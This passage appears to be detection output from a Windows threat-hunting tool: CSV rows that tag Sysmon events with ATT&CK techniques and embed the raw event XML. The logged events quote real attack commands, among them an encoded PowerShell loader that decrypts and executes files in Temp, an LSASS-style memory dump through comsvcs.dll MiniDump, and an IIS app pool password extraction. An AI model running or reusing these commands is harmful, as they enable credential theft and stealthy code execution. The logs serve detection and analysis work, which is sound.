<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
</TimeCreated>
<EventRecordID>243550</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
<Data Name=""ProcessId"">8160</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T21:45:04.922610Z"">
</TimeCreated>
<EventRecordID>244866</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2844"" ThreadID=""3648"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 21:45:04.909</Data>
<Data Name=""ProcessGuid"">747F3D96-8AE0-5E76-0000-0010933B8003</Data>
<Data Name=""ProcessId"">7708</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\windows\system32\cmd.exe&quot;</Data>
<Data Name=""CurrentDirectory"">c:\Users\Public\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-06A4-5E76-0000-002087DE0200</Data>
<Data Name=""LogonId"">0x2de87</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-06AA-5E76-0000-001046E10400</Data>
<Data Name=""ParentProcessId"">4668</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-13T18:03:21.212898Z"">
</TimeCreated>
<EventRecordID>17289</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""276"" ThreadID=""2056"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-13 18:03:20.485</Data>
<Data Name=""ProcessGuid"">365ABB72-B167-5CD9-0000-001062160C00</Data>
<Data Name=""ProcessId"">2476</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">IEWIN7</Data>
<Data Name=""SourcePort"">49159</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.128.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-03-21T05:00:25.392464Z"">
</TimeCreated>
<EventRecordID>243550</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2860"" ThreadID=""3508"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-03-21 05:00:25.388</Data>
<Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-001055912000</Data>
<Data Name=""ProcessId"">8160</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
<Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
<Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
<Data Name=""ParentProcessId"">1652</Data>
<Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.168542Z"">
</TimeCreated>
<EventRecordID>25</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.138</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T17:01:34.168542Z"">
</TimeCreated>
<EventRecordID>25</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 17:01:34.138</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:17.270700Z"">
</TimeCreated>
<EventRecordID>5886</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:17.230</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6D-5CEB-0000-0010D763FF00</Data>
<Data Name=""ProcessId"">3240</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;ERROR ( message:Configuration error &quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-08-30T12:54:08.354049Z"">
</TimeCreated>
<EventRecordID>32154</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3292"" ThreadID=""928"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-08-30 12:54:08.331</Data>
<Data Name=""ProcessGuid"">747F3D96-1C70-5D69-0000-0010C9661F00</Data>
<Data Name=""ProcessId"">2888</Data>
<Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows host process (Rundll32)</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-1B6A-5D69-0000-0020E5810E00</Data>
<Data Name=""LogonId"">0xe81e5</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
